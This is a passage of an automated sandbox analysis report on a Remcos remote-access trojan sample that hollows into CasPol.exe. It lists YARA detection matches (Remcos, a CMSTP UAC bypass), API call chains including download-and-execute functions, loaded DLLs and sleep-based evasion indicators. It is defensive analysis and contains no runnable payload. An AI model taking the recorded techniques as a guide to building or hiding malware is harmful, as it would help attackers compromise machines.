          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041F0FA6_2_0041F0FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004541596_2_00454159
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004381686_2_00438168
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004461F06_2_004461F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0043E2FB6_2_0043E2FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0045332B6_2_0045332B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0042739D6_2_0042739D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004374E66_2_004374E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0043E5586_2_0043E558
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004387706_2_00438770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004378FE6_2_004378FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004339466_2_00433946
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0044D9C96_2_0044D9C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00427A466_2_00427A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041DB626_2_0041DB62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00427BAF6_2_00427BAF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00437D336_2_00437D33
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00435E5E6_2_00435E5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00426E0E6_2_00426E0E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0043DE9D6_2_0043DE9D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00413FCA6_2_00413FCA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00436FEA6_2_00436FEA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00434E10 appears 54 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00402093 appears 50 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00434770 appears 41 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401E65 appears 34 times
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: String function: 00007FF774A09D50 appears 51 times
          Source: C1ZsNxSer8.exeBinary or memory string: OriginalFilename vs C1ZsNxSer8.exe
          Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGetHRForExceptionRoundToNegativeInfinityScalar.dll~/ vs C1ZsNxSer8.exe
          Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BEC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGetHRForExceptionRoundToNegativeInfinityScalar.dll~/ vs C1ZsNxSer8.exe
          Source: C1ZsNxSer8.exeBinary or memory string: OriginalFilenameGetHRForExceptionRoundToNegativeInfinityScalar.dll~/ vs C1ZsNxSer8.exe
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: C1ZsNxSer8.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9982945393041237
          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@4/1@2/2
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A12A80 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,1_2_00007FF774A12A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_2_00417952
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,6_2_0040F474
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,6_2_0041B4A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_0041AA4A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].jsonJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\chrome-E2SMAR
          Source: C1ZsNxSer8.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C1ZsNxSer8.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeFile read: C:\Users\user\Desktop\C1ZsNxSer8.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\C1ZsNxSer8.exe "C:\Users\user\Desktop\C1ZsNxSer8.exe"
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: C1ZsNxSer8.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: C1ZsNxSer8.exeStatic file information: File size 2673152 > 1048576
          Source: C1ZsNxSer8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: C1ZsNxSer8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: C1ZsNxSer8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: C1ZsNxSer8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C1ZsNxSer8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: C1ZsNxSer8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: C1ZsNxSer8.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: C1ZsNxSer8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C1ZsNxSer8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: C1ZsNxSer8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: C1ZsNxSer8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: C1ZsNxSer8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: C1ZsNxSer8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041CB50
          Source: C1ZsNxSer8.exeStatic PE information: section name: .managed
          Source: C1ZsNxSer8.exeStatic PE information: section name: hydrated
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00457106 push ecx; ret 6_2_00457119
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0045B11A push esp; ret 6_2_0045B141
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0045E54D push esi; ret 6_2_0045E556
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00457A28 push eax; ret 6_2_00457A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00434E56 push ecx; ret 6_2_00434E69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00406EB0 ShellExecuteW,URLDownloadToFileW,6_2_00406EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_0041AA4A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041CB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Delayed program exit found
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040F7A7 Sleep,ExitProcess,6_2_0040F7A7
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory allocated: 145BBD80000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_2_0041A748
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 4908Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 5082Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340Thread sleep count: 4908 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340Thread sleep time: -14724000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340Thread sleep count: 5082 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340Thread sleep time: -15246000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_00409253
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_2_0041C291
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,6_2_0040C34D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_00409665
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0044E879 FindFirstFileExA,6_2_0044E879
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,6_2_0040880C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040783C FindFirstFileW,FindNextFileW,6_2_0040783C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00419AF5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040BB30
